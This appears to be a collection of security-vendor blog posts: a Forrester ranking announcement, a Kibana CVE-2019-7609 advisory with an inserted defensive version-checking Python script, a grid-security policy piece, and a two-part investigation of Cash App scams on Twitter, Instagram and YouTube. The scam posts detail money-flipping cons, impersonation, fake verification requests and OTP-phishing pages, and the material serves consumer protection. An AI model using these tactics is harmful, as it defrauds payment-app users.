Tenable Is Cited As A Leader in Vulnerability Risk Management by Independent Research Firm

The company is top-ranked in strategy and current offering.

Tenable was among 13 select companies invited by Forrester to participate in its October 17, 2019, Forrester Wave™ evaluation, Vulnerability Risk Management, Q4 2019. In this evaluation, Tenable was cited as a Leader in Vulnerability Risk Management (VRM).

The report evaluates solutions that help customers prioritize remediation efforts based on criteria including asset criticality, vulnerability severity and risk-based prioritization, among others. Tenable received the highest scores among all 13 vendors in the current offering category and in the strategy category and was among the top-ranked in the market presence category. In addition, we received the highest score (5.0) in 10 of the 14 evaluation criteria.

Among the report’s findings:

  • Tenable executes on its vision to build the single-source-of-truth platform for VRM. 
  • Part of Tenable’s strong strategy relies on translating data to provide business insight to provide prioritization.
  • Its Vulnerability Priority Rating (VPR) technology surpasses standard CVSS scores as a way to dynamically prioritize risk within an environment. 
  • Their reporting capabilities allow you to break out by line of business and trend over time, in addition to the ability to compare your security posture to your industry and population. 

The Forrester Wave™: Vulnerability Risk Management, Q4 2019, evaluated vendors in three high-level categories: 

  • Current offering - Tenable had the highest score possible across five criteria used in this category, including vulnerability enumeration, asset criticality, vulnerability severity, risk-based prioritization and metrics and reporting. 
  • Strategy - We received the top scores possible in this category in the product vision, execution roadmap and commercial model criteria.
  • Market presence - Tenable received the highest score possible in the criteria used in this category, which includes the number of clients and product revenue.

We believe Tenable’s ranking among VRM vendors demonstrates the value of our platform and reinforces our vision of providing organizations with a cybersecurity system of record to help manage and measure cyber risk. 

Our customers agree. In a recent blog post about how his organization uses Tenable, Sentara Healthcare’s CISO Dan Bowden notes: “In the climate today, there's so much focus from society about companies doing better managing risk, every leadership team and every board in every organization wants to be part of the story of fixing the problem. If you can give them good data about exposure, which things do we really need to do, they understand the data, they can relate to the data. They want to be part of the story to help you solve the problem and manage risk better.”

Indeed, our customers tell us that risk-based prioritization is important not only in helping practitioners determine which vulnerabilities to fix first, but also in communicating with business-side colleagues. For example, according to a recent blog post, Emerson uses Tenable.io to provide context for cybersecurity conversations throughout the organization, including in the executive suite. “It's important for them to see trending...and it's important for them to see results,” said Jon Brown, the company’s Manager of Application and Product Security Testing. “They need to be able to understand where [you’re] at and where you're going and why you are going there.”

This designation as a Leader in the Q4 2019 Vulnerability Risk Management Forrester Wave adds to our growing list of awards and distinctions. Tenable.io was recognized as the Best Vulnerability Management Solution at the 2019 SC Awards. We released our groundbreaking Predictive Prioritization capabilities in Tenable.io and Tenable.sc earlier this year, and we are extending Tenable Lumin to support Tenable.sc by the end of 2019 as the result of explosive demand. As the Forrester report notes, “On its roadmap, Tenable has outlined plans to make improvements to its core VM product, its cyber exposure analytics product, Lumin, and its partner ecosystem. Tenable is a great choice for enterprises looking for a VRM vendor that provides strong prioritization and reporting across device types.”

Learn more:

  • Download The Forrester Wave™: Vulnerability Risk Management, Q4 2019 here.

CVE-2019-7609: Exploit Script Available for Kibana Remote Code Execution Vulnerability

An exploit script for the previously patched Kibana vulnerability is now available on GitHub.

Background

On October 21, an exploit script was published to GitHub for a patched vulnerability in Kibana, the open-source data visualization plugin for Elasticsearch. Elasticsearch and Kibana are part of the popular Elastic Stack (also known as ELK Stack), a series of open-source applications used for centralized log management.

Analysis

CVE-2019-7609 is an arbitrary code execution vulnerability in Kibana’s Timelion visualizer. The vulnerability was patched in February 2019.

According to Elastic’s advisory for the flaw, an attacker capable of accessing the Timelion application “could send a request that will attempt to execute javascript code” that could result in the attacker executing arbitrary commands on the host under the same permissions as the vulnerable Kibana process.

On October 14, Michał Bentkowski, a security researcher at Securitum, presented a talk at OWASP Poland Day about Prototype Pollution. Bentkowski’s slides from the presentation were published to slides.com, and include his research on CVE-2019-7609, along with proof-of-concept (PoC) code exploiting the vulnerability.

On October 16, Alibaba Cloud security researcher Henry Chen tweeted out the PoC from Bentkowski’s slides:

Bentkowski’s research became the basis for the exploit script published earlier this week. The exploit script is designed to identify whether or not a target version of Kibana is vulnerable. If vulnerable, the exploit script will attempt to create a reverse shell on the vulnerable host. 

The following table contains information about the vulnerable versions of Kibana based on the information in the Elastic advisory.

Kibana Versions       | Status
----------------------|----------------
3.0 through 5.6.14    | Vulnerable
6.0.0 through 6.6.0   | Vulnerable
5.6.15                | Not Vulnerable
6.6.1 and above       | Not Vulnerable

A BinaryEdge search reveals more than 4,200 publicly accessible Kibana instances. The most prominent versions of Kibana are vulnerable versions, such as 6.2.4, 6.3.2 and 6.3.1.

Kibana instances

Proof of concept

As mentioned, a PoC was published in a slide deck from security researcher Michał Bentkowski and included as part of the exploit script published to GitHub. 

Solution

Administrators and users of the Elastic Stack (or ELK Stack) should upgrade to Kibana versions 5.6.15 or 6.6.1 and above. However, if upgrading is not feasible at this time, modify the kibana.yml configuration file to disable Timelion by setting timelion.enabled to false.
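As an added, defender-side example (not Tenable's plugin logic and not code from the article), the following Python classifies an inventory of Kibana hosts against the version table above and the timelion.enabled workaround; the host names and kibana.yml fragments are constructed, and only the flat dotted key named in the advisory workaround is parsed.

```python
"""Classify Kibana deployments against CVE-2019-7609 (Timelion RCE).

Affected ranges follow the Elastic advisory as summarised in the article:
3.0 through 5.6.14 and 6.0.0 through 6.6.0 are vulnerable; 5.6.15 and
6.6.1+ are fixed. Added example code; host names and config text are
constructed for illustration.
"""
import re
from typing import Tuple

Version = Tuple[int, int, int]

# Inclusive (low, high) ranges of vulnerable releases per the advisory table.
VULNERABLE_RANGES = (
    ((3, 0, 0), (5, 6, 14)),
    ((6, 0, 0), (6, 6, 0)),
)


def parse_version(text: str) -> Version:
    """Turn '6.2.4', '5.6' or 'v6.6.1-SNAPSHOT' into a 3-tuple of ints."""
    m = re.match(r"v?(\d+)(?:\.(\d+))?(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Kibana version string: {text!r}")
    major, minor, patch = (int(g) if g is not None else 0 for g in m.groups())
    return (major, minor, patch)


def is_vulnerable_version(version: str) -> bool:
    """True if the Kibana release falls inside an affected range."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in VULNERABLE_RANGES)


def timelion_enabled(kibana_yml: str) -> bool:
    """Read the flat 'timelion.enabled' key from kibana.yml text.

    Timelion is on by default, so a missing or commented-out key counts as
    enabled. Only the dotted form from the advisory workaround is parsed;
    a nested 'timelion:' / 'enabled:' block is deliberately not handled.
    """
    for line in kibana_yml.splitlines():
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        m = re.match(r"timelion\.enabled\s*:\s*(\S+)", stripped)
        if m:
            return m.group(1).strip("\"'").lower() not in ("false", "no", "off")
    return True


def classify(version: str, kibana_yml: str = "") -> str:
    """Return 'patched', 'mitigated' or 'vulnerable' for one deployment."""
    if not is_vulnerable_version(version):
        return "patched"
    if not timelion_enabled(kibana_yml):
        return "mitigated"  # affected build, but the Timelion plugin is off
    return "vulnerable"


# Constructed sample inventory: the versions the article calls out as most
# prominent in the BinaryEdge results, plus the two fixed releases.
SAMPLE_HOSTS = {
    "kibana-a.example.internal": ("6.2.4", "server.port: 5601\n"),
    "kibana-b.example.internal": ("6.3.2", "# timelion.enabled: false\n"),
    "kibana-c.example.internal": ("6.3.1", "timelion.enabled: false\n"),
    "kibana-d.example.internal": ("5.6.15", ""),
    "kibana-e.example.internal": ("6.6.1", ""),
}


def report(hosts=SAMPLE_HOSTS) -> dict:
    """Map each host to its classification."""
    return {host: classify(ver, yml) for host, (ver, yml) in hosts.items()}


if __name__ == "__main__":
    for host, status in report().items():
        print(f"{host:28} {status}")
```

Note that the commented-out key on kibana-b is still reported as vulnerable, which is the failure mode to look for when auditing a "disabled Timelion" claim.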

Identifying affected systems

A list of Tenable plugins to identify this vulnerability can be found here.

Get more information 

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

This Is How Public-Private Partnerships Strengthen Grid Security

In recent years, the increased availability of IoT and OT devices has enabled the electric grid to operate more efficiently. But, these devices also expand the cyber threat landscape, creating prime targets for cybercriminals.

Connected devices – and the infrastructure that supports them – open the grid to hackers. And, the potential consequences are serious. For example, a major disruption to the grid could inconvenience millions of users, threaten the safety of hospital patients or throw global markets into chaos.

What’s needed to secure the grid?

Utilities across the United States are keenly aware of these threats. And, they have made significant investments to secure the grid, including bigger security departments and expensive cybersecurity tools.

Vulnerability management is key to protecting the grid

However, another key piece of protecting the grid is vulnerability management. Utilities must implement strong vulnerability management practices to make more efficient use of their resources and tools.

Identifying, prioritizing and mitigating vulnerabilities in a strategic manner is incredibly important as utilities manage an increasingly connected infrastructure of IT, IoT and OT devices. Without proactive management of the onslaught of threats to the grid, utilities are sitting ducks, susceptible to potentially significant attacks.

Congress is taking action to promote cybersecurity for electric utilities

Congress has taken note and introduced several bills this year to address grid security. Perhaps the most impactful is the Enhancing Grid Security through Public-Private Partnerships Act, introduced by Rep. Jerry McNerney (D-CA) and Rep. Bob Latta (R-OH) in the House and Sen. Cory Gardner (R-CO) and Sen. Michael Bennet (D-CO) in the Senate. This legislation seeks to encourage partnerships among the Department of Energy (DoE), state regulatory authorities, industry stakeholders and other federal agencies to promote and advance physical security and cybersecurity for electric utilities – keeping the lights on and our economy moving. 

Public-private partnerships are vital to grid security

Public-private partnerships are vital to improved coordination and security. The federal government can convene stakeholders to set standards that will encourage both the public and private sectors to step up their security practices. The private sector has a tremendous amount of expertise and tools to share with its federal and state partners. And, encouraging the federal government to make use of the private sector’s resources is a common-sense starting point in the ongoing fight to secure the electric grid.

We’ve already seen some success with public-private partnerships. For example, the DoE works with the private sector to improve grid security at its national labs, which are hotbeds of innovative projects that have developed supercomputers, improved grid resiliency and more.

But, we can do more. For instance, the DoE can leverage and promote the excellent work already being done at the NIST National Cybersecurity Center of Excellence (NCCoE), which brings together government, industry and academia to address the most pressing cybersecurity issues for various industries.

Using the comprehensive cybersecurity solutions created through NCCoE energy-sector projects would go a long way to help the utility industry scan for vulnerabilities created by their increasingly connected technology – and, thus, better manage their cyber posture.

At Tenable, we work with our partners in the federal government every day to help improve their cybersecurity standing. Streamlining these relationships would unleash the full potential of these partnerships. 

The time to act is now. Recent legislation is a strong start to securing the grid and keeping the economy moving. As cybersecurity professionals, lawmakers and federal government employees, we can have a tremendous impact on our nation’s security.

Learn more about vulnerability management

Accurately identify, investigate and prioritize vulnerabilities.

Try Tenable.io

Cash App Scams: Legitimate Giveaways Provide Boost to Opportunistic Scammers

Scammers target vulnerable Cash App users on Twitter and Instagram through fake requests, money flipping and mobile application referrals, while YouTube videos promote fake Cash App generators. Here’s what you need to know. 

Cash App, the popular person-to-person (P2P) payment service application from Square, has been steadily growing since its debut in late 2013. The service’s growth has been fuelled by a promotion marketing campaign offering cash giveaways to those who engage with the brand on various social media platforms. The success of these promotions, in turn, is emboldening an army of scammers who employ a variety of cons to separate social media users from their hard-earned cash.

A look at the numbers makes it easy to see why Cash App is such a promising target for scammers. According to an August 2019 MarketWatch article, Cash App received a whopping 2.4 million downloads in July 2019. The same article notes Cash App has been downloaded 59.8 million times since its 2013 launch, outpacing its biggest competitor, Venmo, which has been downloaded 52.7 million times. 

Music has played a role in fueling Cash App’s popularity, as 200 rap artists have namechecked the app in song lyrics and used the app to give money to fans, whether “just because,” as Lil B did, or as part of a giveaway promotion for scoring a number one album, as Travis Scott did.

Some consumer brands have also activated marketing campaigns using the service. For example, Burger King began its Whopper Loans promotion by teasing a giveaway using Cash App.

This two-part series details the practices I uncovered while researching these scammers from July to September 2019. This research is not meant to be a comprehensive overview of all such scams; rather it’s an analysis of behavioral trends among a group of scammers targeting the popularity and interest around one particular application. 

Here, in part one, I explore how Cash App’s soaring popularity is attracting opportunistic scammers and their methods of operation on Twitter and Instagram. In part two, I provide further details on the tactics used by Cash App scammers on Instagram, as well as examine videos hosted on YouTube, which claim to provide ways to earn “free money” and “hack” Cash App. In addition, I provide guidance and advice on how users of the P2P payment service can avoid being conned.  

#CashAppFriday and #SuperCashAppFriday Giveaways

Since 2017, Square has been running a weekly giveaway to Cash App users under the hashtag #CashAppFriday and, in one instance, #CashAppWednesday. The premise is very simple: Cash App will post about the giveaway every Friday using #CashAppFriday or #SuperCashAppFriday on Instagram and Twitter, and users can enter the giveaway by sharing to their story, retweeting or replying to the posts with their $cashtag, a unique ID for users and businesses to make it easier to send and receive money. The company randomly selects winners and deposits an unspecified amount of money into their Cash App accounts. More recently, the company launched another giveaway called #SuperCashAppFriday, offering total prizes from $10,000 to $75,000, depositing anywhere between $100 to $500 into Cash App user accounts.

Needless to say, #CashAppFriday has been extremely popular. Each week, it is one of the top trends on Twitter, receiving thousands of tweets during each event.

On Instagram, a recent Cash App giveaway of $75,000 resulted in Instagram limiting comments on the post, showcasing just how popular these Cash App giveaways are.

Unsurprisingly, Cash App’s legitimate giveaways are a breeding ground for scammers.

Seeding #CashAppFriday Scams

The most obvious place to find Cash App scammers is in the replies to Square’s Cash App social media accounts on Twitter and Instagram during #CashAppFriday and #SuperCashAppFriday.

Cash App scammers tend to post some variation of the same theme: Giving away “X” amount of dollars to the first “Y” number of users to retweet this tweet. They’ll also ask users to reply with and/or send them a Direct Message (DM) with their $cashtags.

However, not all Cash App scammers reply directly to @CashApp on Twitter. Instead, they’ll “ride the hashtag” because Cash App’s hashtags always trend on Twitter.

In the course of my research, I’ve also encountered some Cash App scammers not using any of the Cash App hashtags whatsoever. These typically involve the same promise of a giveaway to the first X number of users who retweet and include their “cashapp name” ($cashtag).

Check The Replies

In the tweets from Cash App scammers, you’ll often find a sea of $cashtags from users in the replies, similar to what you’d find in the replies to the real @CashApp Twitter account. Interspersed through these replies, you’ll see the Cash App scammer replying with “Dm me” messages to potential victims.

Interestingly enough, some of the Cash App scammers use their other scam accounts to foster fake engagement by liking, retweeting or replying in an effort to create a sense of legitimacy around their scams.

Case in point: A Cash App scam account named “Eva” tweeted out a giveaway to the “first 900” people. In the replies to Eva, three separate Cash App scam accounts responded claiming the offer is legitimate, even including screenshots from Cash App to support their claims. A few red flags are presented here.

First, the screenshots include dollar values less than or greater than the offered amount of $900. Second, the screenshots are from the perspective of the scammer, which is unusual. This is because it says a dollar amount “was instantly deposited to your bank account,” which means money was transferred from Cash App to a bank account, not to a Cash App user. It is unusual because most of the Cash App scammers I’ve observed tend to post screenshots with examples of money being sent to unidentified users.

Finally, and most importantly, look closely at the dollar amount being offered and the number of users eligible for the giveaway. In this case, it is $900 for 900 users, which equals $810,000. When Cash App itself does giveaways, it normally offers a more modest sum of money — as low as $5 per person in some cases. Even in promotions where the giveaway amounts are higher — such as a #SuperCashAppFriday — the offer would never exceed $10,000-$75,000 in total. The math just doesn’t add up, and in most Cash App scam giveaways, it never will.

There are even some instances where different Cash App scammers will encroach on the territory of other Cash App scammers, as seen in the screenshot above. 

In addition to seeing such screenshots of Cash App transactions, I’ve also seen some Cash App scammers favorite and retweet videos and images of people holding large sums of cash, claiming they received them from the Cash App scammer. While not confirmed, I suspect these accounts are also owned and operated by the scammers.

Cash Flipping: A Timeless Con

Behind these so-called Cash App scam giveaways, there’s a timeless con at work. It is illustrated in an Abbott and Costello skit, called “Two Tens for a Five,” which begins with an unsuspecting Costello being asked by Abbott if he can exchange two $10 bills for his $5 bill, resulting in a $15 profit for Abbott and a $15 loss for Costello.

In the case of Cash App scams, they follow the blueprint of what’s called money (or cash) flipping. The victims are asked by the scammers to put up a certain amount of money, which can range from as little as $10 to as much as $1,000. The scammers claim they can modify (or “flip”) the transaction after it’s been posted because they have some “software” or because they are a customer service representative, allowing them to change the value in whatever payment service they use (in this case, Cash App). All they ask is that the victim provides them with a small cut for their “services.”

Money flipping isn’t new to social media; it’s been pervasive on Twitter, Facebook, Instagram and Snapchat for years. What makes this particular form of money flipping so nefarious and successful is that it capitalizes on a legitimate giveaway proposition from a reputed company — Square and its Cash App product — and then victimizes people who are hoping to be selected in this legitimate giveaway. In a perverse indicator of their success, it seems the legitimate Cash App giveaways are fueling other money flipping scammers to switch over to Cash App as their product of choice.

It Goes Down In The DM 

When users are asked to DM these Cash App scammers, they’ll be told that there’s one more required step before they receive the giveaway prize.

The Cash App scammers claim to be “customer service representatives” at Cash App and talk about how they can “flip transactions from my system.” They then talk about example dollar amounts that can be flipped to higher amounts, starting at the lower end (e.g. $50), all the way up to a larger amount (e.g. $100). They also claim they have proof. If pressed with further questions, the scammers will stop responding.

If a user agrees to the con, they’ll be asked to send the initial payment to the Cash App scammer. The reality is that the Cash App scammer will receive the payment and never respond back to the user after they’ve received the initial payment, leaving the user out in the cold. However, I speculate that in some instances, certain Cash App scammers may offer a smaller “flip” in order to gain the trust of the user first. For example, they may actually deliver on a promise to turn $2 into $20 to prove the “flip” works. It is a minimal investment from the Cash App scammer’s perspective in order to earn the trust of the victim. From there, the scammer will ask the user to try sending them a higher dollar amount, from $50 to $100. This type of trust-gaining flip is likely fairly rare; in my estimation, the majority of users will send a certain dollar amount to the Cash App scammer, never to hear from them again.

Gift Card Scammers Find New Home in Cash App Giveaways

In other cases I’ve observed, some Cash App scammers will ask the recipient to gain their trust by asking them to go to a website or a brick-and-mortar store and purchase a prepaid “gift” card.

In a 2018 article from the United States Federal Trade Commission (FTC), the agency observed a staggering 270 percent increase in the demand for gift card payments from scammers since 2015. Therefore, it is not surprising to see remnants of this trickle into the world of Cash App scams, because it’s a lot harder to trace back theft of funds from a gift card than it is to identify a Cash App scammer using the platform with an associated $cashtag and telephone number.

Abuse of Referral Bonuses

Besides gift cards, another Cash App scam involves the promise of a “blessing” in exchange for the user signing up to cashback services, like Dosh Cash, and price drop monitoring service Waldo, neither of which is affiliated with Square’s Cash App.

Dosh Cash and Waldo incentivize referrals, offering $5 per referral for users who sign up using a referral link or code and link a credit or debit card. As seen in the tweets above, one Cash App scammer convinced a user to sign up to both services. In the DMs, you’ll see this user say “I did my part you need to do yours” and “You told me to do that with the last link and you still didn’t cash app me.” The Cash App scammer this person has engaged with has been operating this particular scheme since at least 2018.

Incoming Requests from Cash App Scammers

Typically on #CashAppFriday, Cash App will randomly send money to users replying to its tweets or Instagram posts. Users lucky enough to be recipients of a real “Cash App Blessing” will sometimes share screenshots and thank the company.

The screenshot above shows a genuine interaction from a user who actually received $5 from the real Cash App account. You can tell the requests are coming from the real Cash App account because the $cashtag here is $cashapp.

Still, that hasn’t stopped Cash App scammers from impersonating the company. Instead of sending money to unsuspecting users, the Cash App scammers will use the “request” functionality of Cash App to ask users for money for “verification” purposes.

In the example above, a user initially thought they’d received a “blessing,” but instead were asked to send $10 for “verification” in order to receive $500. The Cash App scammer in this instance used the same profile photo as the real Cash App, but did not have the same name.

In another instance, a Cash App scammer used the same “request” functionality, but their account had a different profile image and the name included a space between the “C” and “ash” in the word Cash. Cash App prevents users from assigning “Cash App” to their Full Name in an effort to squelch name impersonation. Yet, that clearly hasn’t stopped scammers from finding workarounds.

Impersonation Persists in Cash App Scams

I’ve previously reported on the phenomenon of impersonation on social media apps like TikTok. So it’s no surprise to see scammers are using impersonation tactics in Cash App scams in a few ways. The most obvious impersonators in Cash App scams are those posing as the real Cash App or claiming to be customer service representatives at Cash App.

Some impersonation accounts use official image assets from Cash App. Others use assets that are similar, but not exactly the same.

The other interesting aspect of the impersonator above is their claim to also accept payments via Apple Pay, which includes a screenshot of an Apple Cash card with over $2,000 on it. Apple Cash is Apple’s own P2P product designed to compete with Venmo and Cash App.

Some impersonators claiming to be Cash App representatives use photos of real people. In the case above, this impersonator calls themselves Nickoli Foxworth. In actuality, Nickoli is using a photo of a Czechoslovakian entrepreneur named Pavol Krúpa.

No impersonation would be complete if Cash App scammers didn’t impersonate Twitter and Square CEO Jack Dorsey.

This same Jack Dorsey impersonator on Twitter was also operating their scam on Instagram, where they had gained nearly 3,000 followers. The impersonator claimed they were “hacked” at 16,000 followers, but it is more likely that Instagram removed their previous impersonation page.

Outside of so-called “Cash App Representatives” and Jack Dorsey impersonations, many of the Cash App scammers are likely using stolen photographs and images of real people to create their accounts.

For instance, one Cash App scammer was using photographs and impersonating an Instagram model named Valentina Adall.

The Cash App scammer, who had 12,000 followers, would post offers for #CashAppFriday. When users would DM them, they’d be given the same spiel about being able to alter transactions into a “larger amount” on Cash App or Apple Pay.

In this instance, the Cash App scammer is asking for $300 right off the bat, which is a lot more than most Cash App scammers ask for initially.

Valentina Adall does have a Twitter account and she specifies in her bio that it is her “ONLY account,” which implies she’s been impersonated on Twitter before.

She was made aware of the Cash App scammer’s impersonation account, sarcastically retweeting one of their tweets saying they look alike and “could be twins.”

Not all impersonations are direct impersonations. I’ve observed a Cash App scam account using photos and video content from Hollywood Dollz member Famous Ocean, but calling themselves “Essence.”

For example, the avatar image used by the Cash App scammer called “Essence” was taken from Famous Ocean’s Instagram page.

In another example, a Cash App scammer calling themselves Patrick Bowker claimed to be “blessing those in need via cashapp.”

In this case, Patrick Bowker is using an image of ex-Google CEO and Chairman Eric Schmidt.

Outside of #CashAppFriday, Cash App scammers also target giveaways not directly affiliated with Cash App but which happen to utilize Cash App as a platform to send money. Alfredo Villa, a popular YouTuber who goes by the name “Prettyboyfredo,” runs Cash App giveaways on his Twitter account for his nearly 400,000 Twitter followers. 

When people see these giveaways, they instantly respond with their $cashtags. Responding with $cashtags provides scammers with the information they need to target these unsuspecting users.

A Cash App user tweeted at @Prettyboyfredo, asking him about the giveaway and posting a screenshot of a Cash App request for $20 they received. The message said “congrats you won verify real account to get $1,000.” This is similar to the fake Cash App accounts sending incoming requests that I noted earlier.

These unaffiliated Cash App giveaways appear to be a successful endeavor, as evidenced in the image above. So even if the Cash App scammers aren’t creating impersonation Twitter accounts, they have found it much easier to simply create an impersonation account through Cash App.

Outside of direct impersonations of the Cash App brand, its CEO and notable figures, I believe it is safe to assume the majority of Cash App scammers are using stolen images and video content to create fake personas.

Cash App Phishing

During my research, I also encountered attempts at phishing Cash App users. A user named @dropyourcashtag was riding the #CashAppFriday hashtag, DMing users about winning the giveaway, sending the payment along with a link to a website, saying “go on and receive it.”

Unlike most apps and services, Cash App does not ask for a password. Instead, it asks for an email address or phone number as the username, which triggers a request for a one-time use “login code,” also known as a one-time password (OTP). The code is delivered to the user’s email address or mobile phone, as seen in the image below.

Therefore, Cash App phishing websites will look different from a normal phishing website.

In the example above, the Cash App phishing website prefaces that the cashtag “$cash” (which isn’t affiliated with Cash App) has “initiated deposit of $1000 to your Cashapp.” 

The Cash App phishing website uses a valid Secure Sockets Layer (SSL) certificate obtained from Let’s Encrypt and asks for an email or mobile number. It is followed by a second screen, which asks the user to provide their OTP. Inputting an invalid OTP results in an error message, which implies there may be some type of verification happening to ensure the user provides their valid OTP. To safeguard my privacy during this research, I did not provide my OTP.

However, I did observe a Twitter user who proceeded to provide their information to one of these Cash App phishing websites and reached a fake webpage saying “Payment Failed.” The error message would likely trick the user into believing there was merely a technical problem in sending the so-called giveaway payment, rather than a scam.

I was able to identify at least two Cash App phishing links, both of which used the Bitly URL shortening service. Statistics from those two links showed they each received over 500 clicks, mostly from users in the United States with a few clicks from the United Kingdom, Nigeria, Philippines, Australia and Guatemala. While Cash App is available outside the United States, the giveaways for #SuperCashAppFriday and #CashAppFriday are limited to U.S. participants.

Tenable notified Cash App about our research findings prior to publication. A spokesperson for Cash App provided us with the following statement:

"We are aware of social media accounts that claim to be associated with Cash App. We have been working with Twitter and Instagram to deactivate all accounts that infringe our intellectual property rights (e.g., use our name or logo without permission) or seek to take advantage of our customers.

As a reminder, the Cash App team will never ask customers to send them money, nor will they solicit a customer’s PIN or sign-in code outside of the app. Additionally, Cash App currently has only two official Twitter accounts, @cashapp and @cashsupport, both of which have blue, verified check marks. If you believe you have fallen victim to a scam, you should contact Cash App support through the app or website immediately." 

In part two of this series, I provide details on how Cash App scammers similarly operate on Instagram and explore how scammers are creating YouTube videos claiming to offer ways to earn free money through Cash App by downloading apps. Part two also includes tips and best practices to help users avoid falling for these schemes.

Cash App Scams: Giveaway Offers Ensnare Instagram Users, While YouTube Videos Promise Easy Money

Cash App scammers are targeting users on Instagram and YouTube. Here’s what you need to know about their tactics — and how to avoid being conned.

In part one of our two-part series on Cash App scammers, I explored how promotional tactics used by the popular person-to-person (P2P) payment service have been co-opted by scammers, particularly on Twitter. Here, I share additional details showing how similar cons are perpetrated on Instagram, and how scammers are also creating videos on YouTube to deceive users into believing they have a way to “hack” Cash App for free money. You’ll also find tips and guidance on how to keep your hard-earned cash from falling into the wrong hands.

Instagram Cash App Scams

Cash App scams on Instagram are mostly similar to those on Twitter, with some key differences based on how users interact on each platform. 

Similar to the Twitter #CashAppFriday promotion, Instagram users hoping to win the #CashAppFriday and #SuperCashAppFriday giveaways will leave comments on Cash App Instagram posts with their $cashtag hoping to be selected.

Once again, because users are publicly sharing their $cashtags, Cash App scammers can easily target them directly.

On the same Instagram post from @CashApp, users posted about receiving incoming requests to send $20. One user provided an example account name, $cshfridayoffical, one of a myriad of Cash App accounts impersonating Cash App on its own platform.

A user also posted an image on their profile of a request they received during a recent #CashAppFriday. The post shows an incoming request through Cash App asking for $10 to “verify real account to get $500.” So it’s clear Cash App scammers are using the same tactics outside of Twitter to steal money from Cash App users.  

Where Cash App scams on Instagram differ is in how they adapt to the platform. On Twitter, Cash App scammers reply to #CashAppFriday tweets from @cashapp and to the hashtag itself. On Instagram, the Cash App scammers look for users commenting on @cashapp posts with their $cashtag and follow those users, hoping they’ll look at the scammers’ profiles.

The usernames vary and may include keywords like “cash,” “payroll,” or “rich” in them. Some are more direct with their intentions, including variations of the word “money” and “flip” in them.

These scammers aren’t explicitly targeting Cash App. Rather, as I previously noted, these are traditional money flipping scammers who’ve seen the tremendous popularity of Cash App and the #CashAppFriday giveaways and are trying to prey on desperate users seeking quick cash. 

In the Instagram posts above, a money flipping scammer is posting photos of someone with lots of cash in hand in their vehicle to entice users. They also tease an offer of flipping “$7 into $120,” setting the entry point very low for a potential victim. Finally, they have an example of a series of “Cashapp Flips” through which users can turn anywhere from $10 to $100 into $100 to $1,000. However, potential victims won’t see such returns.

In another Instagram Cash App scam profile, the scammer cautions users to have “at least $25” in Cash App or “any other bank acc.” This profile also includes conversations and images where the scammer supposedly sends money to users. While unconfirmed, it is suspected that these images were either doctored or involved other accounts the scammer operates.

While I did not engage with these Instagram Cash App scammers, since they operate under the model of money or cash flips, it’s clear how the conversation would go. They would ask for an initial payment, claim they have the ability to modify the transactions in the system, ask to be given a cut from the “flip” they perform and mention they have proof that their operation is legit. Clearly, the operation isn’t legit and they would run off with whatever money they would receive.

To underscore how pervasive the Cash App scams are on Instagram, the official Cash App Instagram account recently posted an image with a caption stating the service will “never request money from you.” 

YouTube Cash App Scams

Despite the persistence of these Cash App scams on social media, there is another area of intrigue when it comes to Cash App scams, this time on services like YouTube.

Unlike the money or cash flipping scams on Twitter and Instagram, Cash App scams promoted through YouTube focus on so-called Cash App Money Generators or Cash App Hacks.

Searching for certain keywords relating to free money and Cash App leads to videos claiming to promote a “secret trick” or hacks to get free money on Cash App.

Digging into these videos, they all follow the same basic script:

  1. Voiceover of the video creator with the camera focused on their mobile phone.
  2. They may open their Cash App to reveal $0 in funds.
  3. They open a web browser and tell the viewer which website they need to visit in order to get the “free money.”
  4. The websites may be solely focused on Cash App or have references to other apps and services, requiring the user to “search” for the Cash App page.
  5. The video creator shows the viewer a website asking for a Cash App “ID” ($cashtag) and the amount of money they wish to receive, which can range from $10 to $999.
  6. The websites claim to be starting the process, but are ultimately interrupted because they require “human verification.”
  7. The websites redirect to a page that asks the user to install up to two mobile applications and run them for a specific time (30 seconds) or to play a series of games (e.g. Solitaire).
  8. After completing these steps, the websites claim the user will receive the requested funds.
  9. The video creators have doctored the video to show their Cash App incrementing the value of their available funds or merely increasing the money on the screen to make it appear as though the generator worked and they received the money they requested.

This approach mirrors what I’ve previously seen in scams targeting TikTok users seeking free followers and likes. The only difference is that they’re being promoted on YouTube.

The image above is just one example of a myriad of Cash App “free money” generator/hack websites designed to drive users to “human verification” pages, which require users to fill out surveys (on desktop) and install mobile applications (on mobile).

The “Are you a robot” reference leverages Google’s reCAPTCHA logo to masquerade as a true “verification” service. Because most internet users are accustomed to reCAPTCHA implementations across the web, they might very well believe this is a legitimate verification request. In reality, it’s part of a cost-per-install (CPI) program, where the website creator uses specially crafted links with an affiliate identifier (affid) associated with their own account. This way, when a user installs one of these mobile applications and runs it for 30 seconds, the website creator is paid a small sum of money (less than $1) per install.

In the case of these YouTube videos, it is possible the video authors have created the websites themselves, so they’re earning the affiliate money from the CPI programs. However, I’ve not been able to independently verify whether or not this is the case. Typically, CPI programs pay a very small amount for a successful conversion, often less than $1. They’re less lucrative than other affiliate programs, such as those promoting adult dating websites. 

Safety Tips for Cash App Users

While legitimate giveaways from Cash App and artists and celebrities may pique your interest, it is important to proceed with caution, because Cash App scammers are like sharks in a pond.

If you’re a Cash App user or someone interested in these giveaways or Cash App generators, here are some tips to help keep you safe when using these platforms and the Cash App service.

  • Neither Cash App nor any artist or celebrity offering to give away money will ever ask you to send money as a form of verification. If you receive an incoming request in your Cash App for money to verify you’re real, ignore the request and report the user.
  • Be skeptical of posts on Twitter and Instagram promoting #CashAppFriday or other giveaways. Do the math; if it sounds too absurd ($900 for the first 900 people) then it will turn out to be a scam. Even if it is a modest sum ($20 for the first 100 people), be skeptical.
  • Flipping money isn’t real. There is no program or method to alter transactions to increase the value within Cash App or any other person-to-person payment service. If the proof offered to you is flipping $2 to $20, know that the Cash App scammer is using their own stash of funds to gain your trust to steal a higher sum of money from you.
  • If you receive a message from someone saying you’ve won a Cash App giveaway and they include a link to a website that asks you to log in to your Cash App, it is almost certainly a phishing site. Do not enter your mobile number or provide your “login code” into any website. Instead of clicking on a link in a DM or a social media post, visit the real Cash App website (https://cash.app) or check your mobile application instead.
